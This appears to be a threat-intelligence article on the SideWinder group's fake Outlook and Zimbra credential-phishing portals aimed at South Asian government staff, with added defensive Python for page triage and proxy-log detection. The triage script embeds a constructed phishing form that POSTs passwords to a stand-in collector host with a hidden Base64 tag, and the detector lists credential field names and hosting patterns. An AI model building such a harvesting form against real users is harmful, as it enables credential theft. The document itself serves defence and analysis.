The SideWinder Advanced Persistent Threat (APT) group, a state-sponsored entity with a history of cyber espionage in South Asia, has initiated a sophisticated phishing campaign. This operation involves the creation of counterfeit Outlook and Zimbra webmail portals designed to steal login credentials from government and military personnel in countries such as Pakistan, Nepal, Sri Lanka, Bangladesh, and Myanmar.
Tactics and Techniques
Since mid-2025, SideWinder has hosted its fraudulent login pages on free platforms: Netlify, Cloudflare Pages (pages.dev) and Cloudflare Workers (workers.dev). The group uses maritime- and defense-themed lure documents to draw targets to those pages, where they are asked to enter their credentials. The lures often masquerade as official communications, which raises the chance that a recipient follows through.
For instance, in August 2025 Hunt.io's telemetry showed rapid turnover of phishing domains, with new sites appearing every three to five days. Many of these sites impersonated the Directorate General of Defense Purchases (DGDP) in Bangladesh, presenting "Secured File" portals that asked users for their email credentials, ostensibly to view information about Turkish defense equipment.
Similarly, staff at Nepal's Ministry of Finance received invitations to view a PDF named सम्माननीय प्रधानमन्त्रीज्यूको चीन भ्रमण सम्बन्धमा.pdf ("Regarding the Honourable Prime Minister's visit to China"), which redirected them to a counterfeit Outlook login page hosted on Netlify. The page closely mirrored the appearance of the legitimate portal.
Credential Harvesting Mechanism
The fake portals collect credentials through a plain HTML form whose submission goes directly to attacker-controlled infrastructure rather than to the impersonated mail server. A phishing page targeting Pakistan's Space and Upper Atmosphere Research Commission (SUPARCO), for example, contained a login form that POSTed the captured credentials to a specific attacker-controlled endpoint.
A hidden `inbox` field in that form carried a Base64-encoded email address, which lets the operators tag each submission with the campaign it came from while keeping the address out of casual view in the page source. Once harvested, the credentials can be used to reach restricted networks, and the same infrastructure has been used to deploy additional malware from open directories hosted on various IP addresses.
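The following triage helper is an added example, not code from the original article or from the SideWinder kit. It parses a constructed HTML sample shaped like the form described above (a login form with a hidden Base64 `inbox` field), reports where the credentials would be POSTed, checks whether the submission leaves the hosting origin, and decodes the campaign tag. The hostnames, the `collector.example` endpoint and the sample page itself are assumptions for illustration.

```python
"""Triage a captured credential-phishing page: find password forms, resolve
their POST targets and decode Base64 campaign tags in hidden fields.

Added example; the page, hosts and field names below are constructed."""
import base64
import binascii
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample resembling the form described in the article; not a real capture.
SAMPLE_PAGE = """
<html><body>
<form id="login" method="POST" action="https://collector.example/submit.php">
  <input type="hidden" name="inbox" value="b3BzQGV4YW1wbGUubmV0">
  <input type="email" name="email" placeholder="Email">
  <input type="password" name="password" placeholder="Password">
  <button type="submit">Sign in</button>
</form>
</body></html>
"""

# Free hosting platforms named in the article.
FREE_HOSTING_SUFFIXES = ("netlify.app", "pages.dev", "workers.dev")


class FormExtractor(HTMLParser):
    """Collect every <form> with its method, action and <input> elements."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"method": (a.get("method") or "GET").upper(),
                             "action": a.get("action") or "", "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append({"type": (a.get("type") or "text").lower(),
                                            "name": a.get("name") or "",
                                            "value": a.get("value") or ""})

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def decode_b64_tag(value):
    """Decode a Base64 campaign tag; return None if it is not valid Base64 text."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage(page_html, page_url):
    """Return one finding per form that contains a password field."""
    parser = FormExtractor()
    parser.feed(page_html)
    page_host = urlparse(page_url).hostname or ""
    findings = []
    for form in parser.forms:
        if not any(i["type"] == "password" for i in form["inputs"]):
            continue
        action = urljoin(page_url, form["action"])       # relative actions resolve against the page
        action_host = urlparse(action).hostname or ""
        hidden = {i["name"]: i["value"] for i in form["inputs"] if i["type"] == "hidden"}
        decoded = {k: decode_b64_tag(v) for k, v in hidden.items()}
        findings.append({
            "method": form["method"],
            "action": action,
            "cross_origin_post": action_host != page_host,  # credentials leave the hosting origin
            "hosted_on_free_platform": page_host.endswith(FREE_HOSTING_SUFFIXES),
            "hidden_fields": hidden,
            "decoded_tags": {k: v for k, v in decoded.items() if v is not None},
        })
    return findings


if __name__ == "__main__":
    # Hypothetical page URL on a free hosting platform, for the demo only.
    for f in triage(SAMPLE_PAGE, "https://login-portal.netlify.app/index.html"):
        print(f)
```

The combination that matters for triage is a password field whose form action points at a different host than the page itself; a legitimate webmail login posts back to its own origin. The decoded tag is worth recording as an indicator, since the same collector address tends to recur across a campaign's short-lived pages.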
Operational Security and Evasion
Because the phishing pages sit on reputable shared platforms, a defender cannot block the parent domains (netlify.app, pages.dev, workers.dev) without also cutting off large amounts of legitimate traffic, so simple domain-based blocklists are of little use. The rapid deployment and turnover of individual sites, each living only days, means that blocklists of specific hostnames lag behind as well. Detection therefore has to rest on continuous monitoring of newly seen hostnames on these platforms and on what the pages do (credential forms posting elsewhere) rather than on where they are hosted.
Recommendations for Mitigation
To counter these phishing campaigns, organizations should implement the following measures:
1. Continuous Monitoring: Watch free hosting platforms for newly seen hostnames that borrow your organization's name or that of agencies you deal with, and review proxy logs for staff visits to such hosts, since each phishing site is typically replaced within days.
2. Advanced Filtering: Inspect outbound form POSTs at the web proxy and alert on submissions carrying password-type fields to hosts outside an allowlist of legitimate login endpoints, especially when the submitting page sits on a free hosting platform.
3. User Education: Train users to recognize phishing attempts, in particular document lures that lead to a login prompt, and to check that a login page's address belongs to their own mail provider before entering credentials.
4. Network Segmentation: Segment networks so that a single compromised account cannot reach restricted systems directly.
5. Multi-Factor Authentication (MFA): Enforce MFA so that stolen passwords alone do not grant access, preferring phishing-resistant methods such as FIDO2 security keys, since one-time codes can themselves be captured by a relaying phishing page.
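The following detection sketch for the monitoring and POST-filtering recommendations above is an added example, not tooling from the article or from any vendor. It runs over constructed JSON-lines proxy records, which are assumed to come from a TLS-inspecting proxy that logs the field names (not the values) of form POST bodies, and flags credential-shaped POSTs to hosts outside an allowlist, escalating when either the destination or the submitting page sits on one of the free hosting platforms named in the article. The hosts, the allowlist and the log lines are made up for illustration.

```python
"""Flag credential POSTs to unknown hosts and collect free-hosting hostnames
from proxy logs. Added example; records and hosts below are constructed."""
import json
from urllib.parse import urlparse

# Free hosting platforms named in the article.
FREE_HOSTING_SUFFIXES = ("netlify.app", "pages.dev", "workers.dev")
# Form field names that indicate a password is being submitted.
CREDENTIAL_FIELDS = {"password", "passwd", "pwd", "pass", "passphrase"}
# Hosts where staff legitimately submit a password (assumed for this organization).
ALLOWED_LOGIN_HOSTS = {"login.microsoftonline.com", "mail.example.org"}

# Constructed proxy records (JSON lines); form_keys holds POST body field names only.
SAMPLE_LOG = """
{"ts":"2025-08-12T09:01:10Z","src":"10.20.1.15","method":"GET","url":"https://login-portal.netlify.app/index.html","referer":"","form_keys":[]}
{"ts":"2025-08-12T09:01:42Z","src":"10.20.1.15","method":"POST","url":"https://collector.example/submit.php","referer":"https://login-portal.netlify.app/index.html","form_keys":["inbox","email","password"]}
{"ts":"2025-08-12T09:05:03Z","src":"10.20.1.22","method":"POST","url":"https://mail.example.org/owa/auth.owa","referer":"https://mail.example.org/owa/","form_keys":["username","password"]}
{"ts":"2025-08-12T09:07:55Z","src":"10.20.1.31","method":"POST","url":"https://docs-share.pages.dev/api/login","referer":"https://docs-share.pages.dev/","form_keys":["user","pass"]}
{"ts":"2025-08-12T09:09:20Z","src":"10.20.1.40","method":"POST","url":"https://intranet.example.org/search","referer":"https://intranet.example.org/","form_keys":["q"]}
{"ts":"2025-08-12T09:12:00Z","src":"10.20.1.51","method":"POST","url":"https://updates.example/auth","referer":"https://updates.example/","form_keys":["email","password"]}
"""


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def is_free_hosting(host):
    return host.endswith(FREE_HOSTING_SUFFIXES)


def classify(record):
    """Return (severity, reason) for one proxy record, or None if benign."""
    if record["method"].upper() != "POST":
        return None
    keys = {k.lower() for k in record.get("form_keys", [])}
    if not keys & CREDENTIAL_FIELDS:
        return None                      # no password-shaped field in the body
    dst = host_of(record["url"])
    if dst in ALLOWED_LOGIN_HOSTS:
        return None                      # expected login endpoint
    ref = host_of(record.get("referer", ""))
    if is_free_hosting(dst) or is_free_hosting(ref):
        return ("high", "credential POST involving a free hosting platform")
    return ("medium", "credential POST to host outside the login allowlist")


def scan(log_text):
    """Run classify() over every record and return the alerts in log order."""
    alerts = []
    for line in log_text.strip().splitlines():
        rec = json.loads(line)
        verdict = classify(rec)
        if verdict:
            alerts.append({"ts": rec["ts"], "src": rec["src"],
                           "dst": host_of(rec["url"]),
                           "page": host_of(rec.get("referer", "")),
                           "severity": verdict[0], "reason": verdict[1]})
    return alerts


def free_hosting_iocs(log_text):
    """Free-hosting hostnames seen as destination or referer, for blocking or hunting."""
    hosts = set()
    for line in log_text.strip().splitlines():
        rec = json.loads(line)
        for u in (rec["url"], rec.get("referer", "")):
            h = host_of(u)
            if h and is_free_hosting(h):
                hosts.add(h)
    return sorted(hosts)


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(a)
    print("free-hosting hosts seen:", free_hosting_iocs(SAMPLE_LOG))
```

Two design points: the rule keys on the submitting page's host as well as the destination, because the SUPARCO-style form posts from a free-hosting page to a separate collector, so a destination-only rule would miss it; and the allowlist is deliberately short, since the whole premise of the recommendation is that a password should only ever travel to a handful of known identity endpoints.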
By adopting these strategies, organizations can enhance their resilience against credential-based intrusions and mitigate the risks associated with sophisticated phishing campaigns like those orchestrated by the SideWinder group.